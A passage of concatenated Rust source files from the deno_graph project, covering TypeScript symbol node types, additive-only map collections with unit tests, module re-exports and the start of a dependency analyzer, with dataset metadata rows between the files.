Some((SymbolNodeRef::TsTypeAlias(n.value()), n.source()))
}
SymbolNodeInner::TsInterface(n) => {
Some((SymbolNodeRef::TsInterface(n.value()), n.source()))
}
SymbolNodeInner::Var(decl, declarator, ident) => Some((
SymbolNodeRef::Var(decl.value(), declarator.value(), ident),
decl.source(),
)),
SymbolNodeInner::UsingVar(decl, declarator, ident) => Some((
SymbolNodeRef::UsingVar(decl.value(), declarator.value(), ident),
decl.source(),
)),
SymbolNodeInner::AutoAccessor(n) => {
Some((SymbolNodeRef::AutoAccessor(n.value()), n.source()))
}
SymbolNodeInner::ClassMethod(n) => {
Some((SymbolNodeRef::ClassMethod(n.value()), n.source()))
}
SymbolNodeInner::ClassProp(n) => {
Some((SymbolNodeRef::ClassProp(n.value()), n.source()))
}
SymbolNodeInner::ClassParamProp(n) => {
Some((SymbolNodeRef::ClassParamProp(n.value()), n.source()))
}
SymbolNodeInner::Constructor(n) => {
Some((SymbolNodeRef::Constructor(n.value()), n.source()))
}
SymbolNodeInner::ExpandoProperty(n) => Some((
SymbolNodeRef::ExpandoProperty(ExpandoPropertyRef(n.value())),
n.source(),
)),
SymbolNodeInner::TsIndexSignature(n) => {
Some((SymbolNodeRef::TsIndexSignature(n.value()), n.source()))
}
SymbolNodeInner::TsCallSignatureDecl(n) => {
Some((SymbolNodeRef::TsCallSignatureDecl(n.value()), n.source()))
}
SymbolNodeInner::TsConstructSignatureDecl(n) => Some((
SymbolNodeRef::TsConstructSignatureDecl(n.value()),
n.source(),
)),
SymbolNodeInner::TsPropertySignature(n) => {
Some((SymbolNodeRef::TsPropertySignature(n.value()), n.source()))
}
SymbolNodeInner::TsGetterSignature(n) => {
Some((SymbolNodeRef::TsGetterSignature(n.value()), n.source()))
}
SymbolNodeInner::TsSetterSignature(n) => {
Some((SymbolNodeRef::TsSetterSignature(n.value()), n.source()))
}
SymbolNodeInner::TsMethodSignature(n) => {
Some((SymbolNodeRef::TsMethodSignature(n.value()), n.source()))
}
}
}
}
#[derive(Debug, Clone)]
enum SymbolNodeInnerExportDecl {
Class(NodeRefBox<ClassDecl>),
Fn(NodeRefBox<FnDecl>),
Var(NodeRefBox<VarDecl>, NodeRefBox<VarDeclarator>, Ident),
TsEnum(NodeRefBox<TsEnumDecl>),
TsInterface(NodeRefBox<TsInterfaceDecl>),
TsNamespace(NodeRefBox<TsModuleDecl>),
TsTypeAlias(NodeRefBox<TsTypeAliasDecl>),
}
#[derive(Debug, Clone)]
enum SymbolNodeInner {
Json,
Module(NodeRefBox<Program>),
ClassDecl(NodeRefBox<ClassDecl>),
ExportDecl(NodeRefBox<ExportDecl>, SymbolNodeInnerExportDecl),
ExportDefaultDecl(NodeRefBox<ExportDefaultDecl>),
ExportDefaultExpr(NodeRefBox<ExportDefaultExpr>),
FnDecl(NodeRefBox<FnDecl>),
TsEnum(NodeRefBox<TsEnumDecl>),
TsNamespace(NodeRefBox<TsModuleDecl>),
TsTypeAlias(NodeRefBox<TsTypeAliasDecl>),
TsInterface(NodeRefBox<TsInterfaceDecl>),
Var(NodeRefBox<VarDecl>, NodeRefBox<VarDeclarator>, Ident),
UsingVar(NodeRefBox<UsingDecl>, NodeRefBox<VarDeclarator>, Ident),
AutoAccessor(NodeRefBox<AutoAccessor>),
ClassMethod(NodeRefBox<ClassMethod>),
ClassProp(NodeRefBox<ClassProp>),
ClassParamProp(NodeRefBox<TsParamProp>),
Constructor(NodeRefBox<Constructor>),
ExpandoProperty(NodeRefBox<AssignExpr>),
TsIndexSignature(NodeRefBox<TsIndexSignature>),
TsCallSignatureDecl(NodeRefBox<TsCallSignatureDecl>),
TsConstructSignatureDecl(NodeRefBox<TsConstructSignatureDecl>),
TsPropertySignature(NodeRefBox<TsPropertySignature>),
TsGetterSignature(NodeRefBox<TsGetterSignature>),
TsSetterSignature(NodeRefBox<TsSetterSignature>),
TsMethodSignature(NodeRefBox<TsMethodSignature>),
}
#[derive(Debug, Clone, Copy)]
pub enum ExportDeclRef<'a> {
Class(&'a ClassDecl),
Fn(&'a FnDecl),
Var(&'a VarDecl, &'a VarDeclarator, &'a Ident),
TsEnum(&'a TsEnumDecl),
TsInterface(&'a TsInterfaceDecl),
TsModule(&'a TsModuleDecl),
TsTypeAlias(&'a TsTypeAliasDecl),
}
#[derive(Debug, Clone, Copy)]
pub enum SymbolNodeRef<'a> {
Module(&'a Program),
ExportDecl(&'a ExportDecl, ExportDeclRef<'a>),
ExportDefaultDecl(&'a ExportDefaultDecl),
ExportDefaultExpr(&'a ExportDefaultExpr),
ClassDecl(&'a ClassDecl),
FnDecl(&'a FnDecl),
TsEnum(&'a TsEnumDecl),
TsInterface(&'a TsInterfaceDecl),
TsNamespace(&'a TsModuleDecl),
TsTypeAlias(&'a TsTypeAliasDecl),
Var(&'a VarDecl, &'a VarDeclarator, &'a Ident),
UsingVar(&'a UsingDecl, &'a VarDeclarator, &'a Ident),
// members
AutoAccessor(&'a AutoAccessor),
ClassMethod(&'a ClassMethod),
ClassProp(&'a ClassProp),
ClassParamProp(&'a TsParamProp),
Constructor(&'a Constructor),
ExpandoProperty(ExpandoPropertyRef<'a>),
TsIndexSignature(&'a TsIndexSignature),
TsCallSignatureDecl(&'a TsCallSignatureDecl),
TsConstructSignatureDecl(&'a TsConstructSignatureDecl),
TsPropertySignature(&'a TsPropertySignature),
TsGetterSignature(&'a TsGetterSignature),
TsSetterSignature(&'a TsSetterSignature),
TsMethodSignature(&'a TsMethodSignature),
}
impl<'a> SymbolNodeRef<'a> {
/// The local name of the node, if it has a name.
pub fn maybe_name(&self) -> Option<Cow<'a, str>> {
fn ts_module_name_to_string(module_name: &TsModuleName) -> Option<&str> {
match module_name {
TsModuleName::Ident(ident) => Some(&ident.sym),
TsModuleName::Str(str) => str.value.as_str(),
}
}
fn maybe_key_name(key: &Key) -> Option<Cow<'_, str>> {
match key {
Key::Private(n) => Some(Cow::Owned(format!("#{}", n.name))),
Key::Public(n) => maybe_prop_name(n),
}
}
fn maybe_prop_name(prop_name: &PropName) -> Option<Cow<'_, str>> {
match prop_name {
PropName::Ident(n) => Some(Cow::Borrowed(&n.sym)),
PropName::Str(n) => n.value.as_str().map(Cow::Borrowed),
PropName::Num(n) => Some(Cow::Owned(n.value.to_string())),
PropName::Computed(prop_name) => maybe_expr(&prop_name.expr),
PropName::BigInt(_) => None,
}
}
fn maybe_param_prop_name(param: &TsParamPropParam) -> Option<Cow<'_, str>> {
match param {
TsParamPropParam::Ident(ident) => Some(Cow::Borrowed(&ident.sym)),
TsParamPropParam::Assign(assign_pat) => match &*assign_pat.left {
Pat::Ident(ident) => Some(Cow::Borrowed(&ident.sym)),
Pat::Array(_)
| Pat::Rest(_)
| Pat::Object(_)
| Pat::Assign(_)
| Pat::Invalid(_)
| Pat::Expr(_) => unreachable!(),
},
}
}
fn maybe_expr(expr: &Expr) -> Option<Cow<'_, str>> {
match expr {
Expr::Ident(n) => Some(Cow::Borrowed(&n.sym)),
Expr::Lit(n) => match n {
Lit::Str(n) => n.value.as_str().map(Cow::Borrowed),
Lit::Num(n) => Some(Cow::Owned(n.value.to_string())),
Lit::BigInt(n) => Some(Cow::Owned(n.value.to_string())),
_ => None,
},
_ => None,
}
}
match self {
Self::Module(_) => None,
Self::ClassDecl(n) => Some(Cow::Borrowed(&n.ident.sym)),
Self::ExportDecl(_, n) => match n {
ExportDeclRef::Class(n) => Some(Cow::Borrowed(&n.ident.sym)),
ExportDeclRef::Fn(n) => Some(Cow::Borrowed(&n.ident.sym)),
ExportDeclRef::Var(_, _, ident) => Some(Cow::Borrowed(&ident.sym)),
ExportDeclRef::TsEnum(n) => Some(Cow::Borrowed(&n.id.sym)),
ExportDeclRef::TsInterface(n) => Some(Cow::Borrowed(&n.id.sym)),
ExportDeclRef::TsModule(n) => {
ts_module_name_to_string(&n.id).map(Cow::Borrowed)
}
ExportDeclRef::TsTypeAlias(n) => Some(Cow::Borrowed(&n.id.sym)),
},
Self::ExportDefaultDecl(n) => match &n.decl {
DefaultDecl::Class(n) => Some(Cow::Borrowed(&n.ident.as_ref()?.sym)),
DefaultDecl::Fn(n) => Some(Cow::Borrowed(&n.ident.as_ref()?.sym)),
DefaultDecl::TsInterfaceDecl(n) => Some(Cow::Borrowed(&n.id.sym)),
},
Self::ExportDefaultExpr(_) => None,
Self::FnDecl(n) => Some(Cow::Borrowed(&n.ident.sym)),
Self::TsEnum(n) => Some(Cow::Borrowed(&n.id.sym)),
Self::TsInterface(n) => Some(Cow::Borrowed(&n.id.sym)),
Self::TsNamespace(n) => {
ts_module_name_to_string(&n.id).map(Cow::Borrowed)
}
Self::TsTypeAlias(n) => Some(Cow::Borrowed(&n.id.sym)),
Self::Var(_, _, ident) => Some(Cow::Borrowed(&ident.sym)),
Self::UsingVar(_, _, ident) => Some(Cow::Borrowed(&ident.sym)),
Self::AutoAccessor(n) => maybe_key_name(&n.key),
Self::ClassMethod(n) => maybe_prop_name(&n.key),
Self::ClassProp(n) => maybe_prop_name(&n.key),
Self::ClassParamProp(n) => maybe_param_prop_name(&n.param),
Self::ExpandoProperty(n) => Some(Cow::Borrowed(n.prop_name())),
Self::TsPropertySignature(n) => maybe_expr(&n.key),
Self::TsGetterSignature(n) => maybe_expr(&n.key),
Self::TsSetterSignature(n) => maybe_expr(&n.key),
Self::TsMethodSignature(n) => maybe_expr(&n.key),
// These are unique enough names to avoid collisions with user code.
// They allow having these as exports and resolving them.
Self::Constructor(_) => Some(Cow::Borrowed("%%dg_ctor%%")),
Self::TsIndexSignature(_) => Some(Cow::Borrowed("%%dg_index%%")),
Self::TsCallSignatureDecl(_) => Some(Cow::Borrowed("%%dg_call%%")),
Self::TsConstructSignatureDecl(_) => {
Some(Cow::Borrowed("%%dg_construct%%"))
}
}
}
// todo(dsherret): rename to is_class_decl
/// If the node is a class.
pub fn is_class(&self) -> bool {
matches!(
self,
Self::ClassDecl(_)
| Self::ExportDecl(_, ExportDeclRef::Class(_))
| Self::ExportDefaultDecl(ExportDefaultDecl {
decl: DefaultDecl::Class(_),
..
})
)
}
/// If the node is a function.
pub fn is_function(&self) -> bool {
matches!(
self,
Self::FnDecl(_)
| Self::ExportDecl(_, ExportDeclRef::Fn(_))
| Self::ExportDefaultDecl(ExportDefaultDecl {
decl: DefaultDecl::Fn(_),
..
})
)
}
/// If the node is an interface.
pub fn is_interface(&self) -> bool {
matches!(
self,
Self::TsInterface(_)
| Self::ExportDecl(_, ExportDeclRef::TsInterface(_))
| Self::ExportDefaultDecl(ExportDefaultDecl {
decl: DefaultDecl::TsInterfaceDecl(_),
..
})
)
}
/// If the node is a typescript namespace.
pub fn is_ts_namespace(&self) -> bool {
matches!(
self,
Self::TsNamespace(_) | Self::ExportDecl(_, ExportDeclRef::TsModule(_))
)
}
/// If the node is a variable.
pub fn is_var(&self) -> bool {
matches!(
self,
Self::Var(..) | Self::ExportDecl(_, ExportDeclRef::Var(..))
)
}
/// If the node is a contructor.
pub fn is_ctor(&self) -> bool {
matches!(self, Self::Constructor(_))
}
/// If the node has a body.
pub fn has_body(&self) -> bool {
match self {
SymbolNodeRef::FnDecl(n) => n.function.body.is_some(),
SymbolNodeRef::TsNamespace(n) => n.body.is_some(),
SymbolNodeRef::AutoAccessor(_) => todo!(),
SymbolNodeRef::ClassMethod(m) => m.function.body.is_some(),
SymbolNodeRef::Constructor(n) => n.body.is_some(),
SymbolNodeRef::ExportDefaultDecl(n) => match &n.decl {
DefaultDecl::Fn(n) => n.function.body.is_some(),
DefaultDecl::Class(_) | DefaultDecl::TsInterfaceDecl(_) => true,
},
SymbolNodeRef::ExportDecl(_, decl) => match decl {
ExportDeclRef::TsModule(n) => n.body.is_some(),
ExportDeclRef::Fn(n) => n.function.body.is_some(),
ExportDeclRef::Class(_)
| ExportDeclRef::TsEnum(_)
| ExportDeclRef::TsInterface(_) => true,
ExportDeclRef::TsTypeAlias(_) | ExportDeclRef::Var(..) => false,
},
SymbolNodeRef::Module(_)
| SymbolNodeRef::ClassDecl(_)
| SymbolNodeRef::TsEnum(_)
| SymbolNodeRef::TsInterface(_) => true,
SymbolNodeRef::TsTypeAlias(_)
| SymbolNodeRef::ExportDefaultExpr(_)
| SymbolNodeRef::Var(..)
| SymbolNodeRef::UsingVar(..)
| SymbolNodeRef::ClassProp(_)
| SymbolNodeRef::ClassParamProp(_)
| SymbolNodeRef::ExpandoProperty(..)
| SymbolNodeRef::TsIndexSignature(_)
| SymbolNodeRef::TsCallSignatureDecl(_)
| SymbolNodeRef::TsConstructSignatureDecl(_)
| SymbolNodeRef::TsPropertySignature(_)
| SymbolNodeRef::TsGetterSignature(_)
| SymbolNodeRef::TsSetterSignature(_)
| SymbolNodeRef::TsMethodSignature(_) => false,
}
}
/// If the node is a declaration that can be found in a module.
pub fn is_module(&self) -> bool {
matches!(self, SymbolNodeRef::Module(_))
}
pub fn has_export_keyword(&self) -> bool {
match self {
SymbolNodeRef::ExportDecl(..)
| SymbolNodeRef::ExportDefaultDecl(_)
| SymbolNodeRef::ExportDefaultExpr(_) => true,
SymbolNodeRef::Module(_)
| SymbolNodeRef::ClassDecl(_)
| SymbolNodeRef::FnDecl(_)
| SymbolNodeRef::TsEnum(_)
| SymbolNodeRef::TsInterface(_)
| SymbolNodeRef::TsNamespace(_)
| SymbolNodeRef::TsTypeAlias(_)
| SymbolNodeRef::Var(..)
| SymbolNodeRef::UsingVar(..)
| SymbolNodeRef::AutoAccessor(_)
| SymbolNodeRef::ClassMethod(_)
| SymbolNodeRef::ClassProp(_)
| SymbolNodeRef::ClassParamProp(_)
| SymbolNodeRef::Constructor(_)
| SymbolNodeRef::ExpandoProperty(_)
| SymbolNodeRef::TsIndexSignature(_)
| SymbolNodeRef::TsCallSignatureDecl(_)
| SymbolNodeRef::TsConstructSignatureDecl(_)
| SymbolNodeRef::TsPropertySignature(_)
| SymbolNodeRef::TsGetterSignature(_)
| SymbolNodeRef::TsSetterSignature(_)
| SymbolNodeRef::TsMethodSignature(_) => false,
}
}
/// If the node is a declaration that can be found in a module.
pub fn is_decl(&self) -> bool {
match self {
SymbolNodeRef::Module(_) => false,
SymbolNodeRef::ClassDecl(_)
| SymbolNodeRef::ExportDecl(..)
| SymbolNodeRef::ExportDefaultDecl(_)
| SymbolNodeRef::ExportDefaultExpr(_)
| SymbolNodeRef::FnDecl(_)
| SymbolNodeRef::TsEnum(_)
| SymbolNodeRef::TsInterface(_)
| SymbolNodeRef::TsNamespace(_)
| SymbolNodeRef::TsTypeAlias(_)
| SymbolNodeRef::Var(..)
| SymbolNodeRef::UsingVar(..) => true,
SymbolNodeRef::AutoAccessor(_)
| SymbolNodeRef::ClassMethod(_)
| SymbolNodeRef::ClassProp(_)
| SymbolNodeRef::ClassParamProp(_)
| SymbolNodeRef::Constructor(_)
| SymbolNodeRef::ExpandoProperty(..)
| SymbolNodeRef::TsIndexSignature(_)
| SymbolNodeRef::TsCallSignatureDecl(_)
| SymbolNodeRef::TsConstructSignatureDecl(_)
| SymbolNodeRef::TsPropertySignature(_)
| SymbolNodeRef::TsGetterSignature(_)
| SymbolNodeRef::TsSetterSignature(_)
| SymbolNodeRef::TsMethodSignature(_) => false,
}
}
/// If the node is a member found in a class or interface.
pub fn is_member(&self) -> bool {
match self {
SymbolNodeRef::Module(_)
| SymbolNodeRef::ClassDecl(_)
| SymbolNodeRef::ExportDecl(..)
| SymbolNodeRef::ExportDefaultDecl(_)
| SymbolNodeRef::ExportDefaultExpr(_)
| SymbolNodeRef::FnDecl(_)
| SymbolNodeRef::TsEnum(_)
| SymbolNodeRef::TsInterface(_)
| SymbolNodeRef::TsNamespace(_)
| SymbolNodeRef::TsTypeAlias(_)
| SymbolNodeRef::Var(..)
| SymbolNodeRef::UsingVar(..) => false,
SymbolNodeRef::AutoAccessor(_)
| SymbolNodeRef::ClassMethod(_)
| SymbolNodeRef::ClassProp(_)
| SymbolNodeRef::ClassParamProp(_)
| SymbolNodeRef::Constructor(_)
| SymbolNodeRef::ExpandoProperty(..)
| SymbolNodeRef::TsIndexSignature(_)
| SymbolNodeRef::TsCallSignatureDecl(_)
| SymbolNodeRef::TsConstructSignatureDecl(_)
| SymbolNodeRef::TsPropertySignature(_)
| SymbolNodeRef::TsGetterSignature(_)
| rust | MIT | 200a22dbd56b311d490ad00bed57fce34538598e | 2026-01-04T20:22:02.257944Z | true |
denoland/deno_graph | https://github.com/denoland/deno_graph/blob/200a22dbd56b311d490ad00bed57fce34538598e/src/symbols/collections.rs | src/symbols/collections.rs | // Copyright 2018-2024 the Deno authors. MIT license.
#![allow(dead_code)]
use indexmap::IndexMap;
use std::cell::UnsafeCell;
use std::collections::HashMap;
macro_rules! define_map {
($name:ident, $kind:ident) => {
/// A map that supports inserting data while holding references to
/// the underlying data at another key. Due to this property, the values
/// in the hashmap can never be replaced or removed. Inserting data at a
/// previously inserted to key will cause a panic.
pub struct $name<K, V> {
// store the values in a box to ensure the references are always stored
// in the same place. Uses an UnsafeCell for faster performance.
data: UnsafeCell<$kind<K, Box<V>>>,
}
impl<K, V> Default for $name<K, V> {
fn default() -> Self {
Self {
data: Default::default(),
}
}
}
impl<K, V> $name<K, V> {
#[cfg(test)]
pub fn with_capacity(capacity: usize) -> Self {
Self {
data: UnsafeCell::new($kind::with_capacity(capacity)),
}
}
pub fn len(&self) -> usize {
let data = unsafe { &*self.data.get() };
data.len()
}
}
impl<K: Eq + std::hash::Hash, V> $name<K, V> {
pub fn take(self) -> $kind<K, Box<V>> {
self.data.into_inner()
}
pub fn contains_key(&self, key: &K) -> bool {
let data = unsafe { &*self.data.get() };
data.contains_key(key)
}
pub fn insert(&self, key: K, value: V) {
let data = unsafe { &mut *self.data.get() };
// assert that we never replace any data
assert!(data.insert(key, Box::new(value)).is_none());
}
pub fn get<'a>(&'a self, key: &K) -> Option<&'a V> {
unsafe {
let data = &*self.data.get();
// this is ok because we never remove from the map
data
.get(key)
.map(|value_box| value_box.as_ref() as *const V)
.map(|raw| &*raw)
}
}
}
};
}
define_map!(AdditiveOnlyMap, HashMap);
define_map!(AdditiveOnlyIndexMap, IndexMap);
macro_rules! define_map_for_copy_values {
($name:ident, $kind:ident) => {
/// An additive hash map for data that is `Copy`. This is slightly more
/// optimized than `AdditiveOnlyMap` because it won't copy the value.
pub struct $name<K, V: Copy> {
data: UnsafeCell<$kind<K, V>>,
}
impl<K, V: Copy> Default for $name<K, V> {
fn default() -> Self {
Self {
data: Default::default(),
}
}
}
impl<K, V: Copy> $name<K, V> {
pub fn len(&self) -> usize {
let data = unsafe { &*self.data.get() };
data.len()
}
pub fn take(self) -> $kind<K, V> {
self.data.into_inner()
}
}
impl<K: Eq + std::hash::Hash, V: Copy> $name<K, V> {
pub fn contains_key(&self, key: &K) -> bool {
let data = unsafe { &*self.data.get() };
data.contains_key(key)
}
pub fn insert(&self, key: K, value: V) {
let data = unsafe { &mut *self.data.get() };
data.insert(key, value);
}
pub fn get(&self, key: &K) -> Option<V> {
unsafe {
let data = &*self.data.get();
data.get(key).copied()
}
}
}
};
}
define_map_for_copy_values!(AdditiveOnlyMapForCopyValues, HashMap);
define_map_for_copy_values!(AdditiveOnlyIndexMapForCopyValues, IndexMap);
#[cfg(test)]
mod test {
use super::*;
#[test]
fn should_support_adding_while_holding_ref_to_value() {
struct Value {
value: usize,
}
// use a low capacity which will ensure the map is resized once we exceed it
let map: AdditiveOnlyMap<usize, Value> = AdditiveOnlyMap::with_capacity(2);
map.insert(0, Value { value: 987 });
let data = map.get(&0).unwrap();
for i in 1..100 {
map.insert(i, Value { value: i });
}
assert_eq!(data.value, 987);
assert_eq!(map.get(&0).unwrap().value, 987);
assert_eq!(map.get(&99).unwrap().value, 99);
assert!(map.contains_key(&99));
assert!(!map.contains_key(&100));
}
#[test]
fn support_copy_map() {
let map: AdditiveOnlyMapForCopyValues<usize, usize> =
AdditiveOnlyMapForCopyValues::default();
map.insert(1, 2);
assert_eq!(map.get(&1), Some(2));
assert_eq!(map.get(&0), None);
}
}
| rust | MIT | 200a22dbd56b311d490ad00bed57fce34538598e | 2026-01-04T20:22:02.257944Z | false |
denoland/deno_graph | https://github.com/denoland/deno_graph/blob/200a22dbd56b311d490ad00bed57fce34538598e/src/symbols/mod.rs | src/symbols/mod.rs | // Copyright 2018-2024 the Deno authors. MIT license.
pub use self::analyzer::EsModuleInfo;
pub use self::analyzer::ExpandoPropertyRef;
pub use self::analyzer::ExportDeclRef;
pub use self::analyzer::FileDep;
pub use self::analyzer::FileDepName;
pub use self::analyzer::JsonModuleInfo;
pub use self::analyzer::ModuleId;
pub use self::analyzer::ModuleInfo;
pub use self::analyzer::ModuleInfoRef;
pub use self::analyzer::RootSymbol;
pub use self::analyzer::Symbol;
pub use self::analyzer::SymbolDecl;
pub use self::analyzer::SymbolDeclKind;
pub use self::analyzer::SymbolId;
pub use self::analyzer::SymbolNodeRef;
pub use self::analyzer::UniqueSymbolId;
pub use self::cross_module::Definition;
pub use self::cross_module::DefinitionKind;
pub use self::cross_module::DefinitionOrUnresolved;
pub use self::cross_module::DefinitionPathLink;
pub use self::cross_module::DefinitionPathNode;
pub use self::cross_module::DefinitionPathNodeResolved;
pub use self::cross_module::ModuleExports;
pub use self::cross_module::ResolvedExport;
pub use self::cross_module::ResolvedExportOrReExportAllPath;
pub use self::cross_module::ResolvedReExportAllPath;
pub use self::cross_module::ResolvedSymbolDepEntry;
pub use self::cross_module::UnresolvedSpecifier;
pub use self::dep_analyzer::ResolveDepsMode;
pub use self::dep_analyzer::SymbolNodeDep;
mod analyzer;
mod collections;
mod cross_module;
mod dep_analyzer;
mod swc_helpers;
| rust | MIT | 200a22dbd56b311d490ad00bed57fce34538598e | 2026-01-04T20:22:02.257944Z | false |
denoland/deno_graph | https://github.com/denoland/deno_graph/blob/200a22dbd56b311d490ad00bed57fce34538598e/src/symbols/dep_analyzer.rs | src/symbols/dep_analyzer.rs | // Copyright 2018-2024 the Deno authors. MIT license.
use deno_ast::swc::ast::ArrowExpr;
use deno_ast::swc::ast::BindingIdent;
use deno_ast::swc::ast::BlockStmtOrExpr;
use deno_ast::swc::ast::Class;
use deno_ast::swc::ast::DefaultDecl;
use deno_ast::swc::ast::Expr;
use deno_ast::swc::ast::Function;
use deno_ast::swc::ast::Id;
use deno_ast::swc::ast::Ident;
use deno_ast::swc::ast::Lit;
use deno_ast::swc::ast::MemberExpr;
use deno_ast::swc::ast::MemberProp;
use deno_ast::swc::ast::Param;
use deno_ast::swc::ast::ParamOrTsParamProp;
use deno_ast::swc::ast::Pat;
use deno_ast::swc::ast::PropName;
use deno_ast::swc::ast::TsAsExpr;
use deno_ast::swc::ast::TsCallSignatureDecl;
use deno_ast::swc::ast::TsConstructSignatureDecl;
use deno_ast::swc::ast::TsEnumDecl;
use deno_ast::swc::ast::TsExprWithTypeArgs;
use deno_ast::swc::ast::TsGetterSignature;
use deno_ast::swc::ast::TsImportType;
use deno_ast::swc::ast::TsIndexSignature;
use deno_ast::swc::ast::TsInterfaceDecl;
use deno_ast::swc::ast::TsMethodSignature;
use deno_ast::swc::ast::TsParamProp;
use deno_ast::swc::ast::TsParamPropParam;
use deno_ast::swc::ast::TsPropertySignature;
use deno_ast::swc::ast::TsQualifiedName;
use deno_ast::swc::ast::TsSetterSignature;
use deno_ast::swc::ast::TsTupleElement;
use deno_ast::swc::ast::TsTypeAliasDecl;
use deno_ast::swc::ast::TsTypeAnn;
use deno_ast::swc::ast::TsTypeAssertion;
use deno_ast::swc::ast::TsTypeParam;
use deno_ast::swc::ast::TsTypeParamDecl;
use deno_ast::swc::ast::TsTypeParamInstantiation;
use deno_ast::swc::ast::VarDeclarator;
use deno_ast::swc::ecma_visit::Visit;
use deno_ast::swc::ecma_visit::VisitWith;
use super::ExportDeclRef;
use super::SymbolNodeRef;
use super::swc_helpers::ts_entity_name_to_parts;
use super::swc_helpers::ts_qualified_name_parts;
#[derive(Debug, Clone, PartialEq, Eq, Hash)]
pub enum SymbolNodeDep {
Id(Id),
QualifiedId(Id, Vec<String>),
ImportType(String, Vec<String>),
}
impl From<Id> for SymbolNodeDep {
fn from(value: Id) -> Self {
Self::Id(value)
}
}
#[derive(Debug, Copy, Clone)]
pub enum ResolveDepsMode {
/// Resolve dependencies of types only (used for deno doc).
TypesOnly,
/// Resolve dependencies of types and expressions (used for fast check).
TypesAndExpressions,
}
impl ResolveDepsMode {
pub fn visit_exprs(&self) -> bool {
match self {
ResolveDepsMode::TypesOnly => false,
ResolveDepsMode::TypesAndExpressions => true,
}
}
}
pub fn resolve_deps(
node_ref: SymbolNodeRef,
mode: ResolveDepsMode,
) -> Vec<SymbolNodeDep> {
let mut filler = DepsFiller {
deps: Vec::new(),
mode,
};
filler.fill(node_ref);
filler.deps
}
struct DepsFiller {
deps: Vec<SymbolNodeDep>,
mode: ResolveDepsMode,
}
impl DepsFiller {
fn fill(&mut self, node_ref: SymbolNodeRef<'_>) {
match node_ref {
SymbolNodeRef::Module(_) | SymbolNodeRef::TsNamespace(_) => {
// no deps, as this has children
}
SymbolNodeRef::ClassDecl(n) => {
self.visit_class(&n.class);
}
SymbolNodeRef::ExportDecl(_, n) => match n {
ExportDeclRef::Class(n) => self.visit_class(&n.class),
ExportDeclRef::Fn(n) => self.visit_function(&n.function),
ExportDeclRef::Var(_, n, _) => {
self.visit_var_declarator(n);
}
ExportDeclRef::TsEnum(n) => self.visit_ts_enum_decl(n),
ExportDeclRef::TsInterface(n) => self.visit_ts_interface_decl(n),
ExportDeclRef::TsModule(_) => {
// no deps, as this has children
}
ExportDeclRef::TsTypeAlias(n) => self.visit_ts_type_alias_decl(n),
},
SymbolNodeRef::ExportDefaultDecl(n) => match &n.decl {
DefaultDecl::Class(n) => self.visit_class(&n.class),
DefaultDecl::Fn(n) => {
self.visit_function(&n.function);
}
DefaultDecl::TsInterfaceDecl(n) => {
self.visit_ts_interface_decl(n);
}
},
SymbolNodeRef::ExportDefaultExpr(n) => {
self.visit_expr(&n.expr);
}
SymbolNodeRef::FnDecl(n) => self.visit_function(&n.function),
SymbolNodeRef::TsEnum(n) => {
self.visit_ts_enum_decl(n);
}
SymbolNodeRef::TsInterface(n) => self.visit_ts_interface_decl(n),
SymbolNodeRef::TsTypeAlias(n) => {
self.visit_ts_type_alias_decl(n);
}
SymbolNodeRef::Var(_, n, _) | SymbolNodeRef::UsingVar(_, n, _) => {
self.visit_var_declarator(n);
}
SymbolNodeRef::AutoAccessor(n) => {
if let Some(type_ann) = &n.type_ann {
self.visit_ts_type_ann(type_ann)
}
}
SymbolNodeRef::ClassMethod(n) => {
if self.mode.visit_exprs() {
self.visit_prop_name(&n.key);
}
if let Some(type_params) = &n.function.type_params {
self.visit_ts_type_param_decl(type_params)
}
for param in &n.function.params {
self.visit_param(param)
}
if let Some(return_type) = &n.function.return_type {
self.visit_ts_type_ann(return_type)
}
}
SymbolNodeRef::ClassProp(n) => {
if self.mode.visit_exprs() {
self.visit_prop_name(&n.key);
}
if let Some(type_ann) = &n.type_ann {
self.visit_ts_type_ann(type_ann);
} else if let Some(value) = &n.value {
let visited_type_assertion = self.visit_type_if_type_assertion(value);
if !visited_type_assertion && self.mode.visit_exprs() {
self.visit_expr(value);
}
}
}
SymbolNodeRef::ClassParamProp(n) => self.visit_ts_param_prop(n),
SymbolNodeRef::Constructor(n) => {
for param in &n.params {
match param {
ParamOrTsParamProp::TsParamProp(param) => {
self.visit_ts_param_prop(param)
}
ParamOrTsParamProp::Param(param) => self.visit_param(param),
}
}
}
SymbolNodeRef::ExpandoProperty(n) => {
if self.mode.visit_exprs() {
self.visit_expr(n.assignment());
}
}
SymbolNodeRef::TsIndexSignature(n) => {
self.visit_ts_index_signature(n);
}
SymbolNodeRef::TsCallSignatureDecl(n) => {
self.visit_ts_call_signature_decl(n);
}
SymbolNodeRef::TsConstructSignatureDecl(n) => {
self.visit_ts_construct_signature_decl(n);
}
SymbolNodeRef::TsPropertySignature(n) => {
self.visit_ts_property_signature(n);
}
SymbolNodeRef::TsGetterSignature(n) => {
self.visit_ts_getter_signature(n);
}
SymbolNodeRef::TsSetterSignature(n) => {
self.visit_ts_setter_signature(n);
}
SymbolNodeRef::TsMethodSignature(n) => {
self.visit_ts_method_signature(n);
}
}
}
fn visit_type_if_type_assertion(&mut self, expr: &Expr) -> bool {
if matches!(expr, Expr::TsAs(_) | Expr::TsTypeAssertion(_)) {
self.visit_expr(expr);
true
} else {
false
}
}
}
impl Visit for DepsFiller {
fn visit_ts_index_signature(&mut self, n: &TsIndexSignature) {
for param in &n.params {
self.visit_ts_fn_param(param)
}
if let Some(type_ann) = &n.type_ann {
self.visit_ts_type_ann(type_ann)
}
}
fn visit_ts_call_signature_decl(&mut self, n: &TsCallSignatureDecl) {
if let Some(type_params) = &n.type_params {
self.visit_ts_type_param_decl(type_params);
}
for param in &n.params {
self.visit_ts_fn_param(param);
}
if let Some(type_ann) = &n.type_ann {
self.visit_ts_type_ann(type_ann)
}
}
fn visit_ts_construct_signature_decl(
&mut self,
n: &TsConstructSignatureDecl,
) {
if let Some(type_params) = &n.type_params {
self.visit_ts_type_param_decl(type_params);
}
for param in &n.params {
self.visit_ts_fn_param(param);
}
if let Some(type_ann) = &n.type_ann {
self.visit_ts_type_ann(type_ann)
}
}
fn visit_ts_property_signature(&mut self, n: &TsPropertySignature) {
if n.computed {
self.visit_expr(&n.key);
}
if let Some(type_ann) = &n.type_ann {
self.visit_ts_type_ann(type_ann)
}
}
fn visit_ts_getter_signature(&mut self, n: &TsGetterSignature) {
if n.computed {
self.visit_expr(&n.key);
}
if let Some(type_ann) = &n.type_ann {
self.visit_ts_type_ann(type_ann)
}
}
fn visit_ts_setter_signature(&mut self, n: &TsSetterSignature) {
if n.computed {
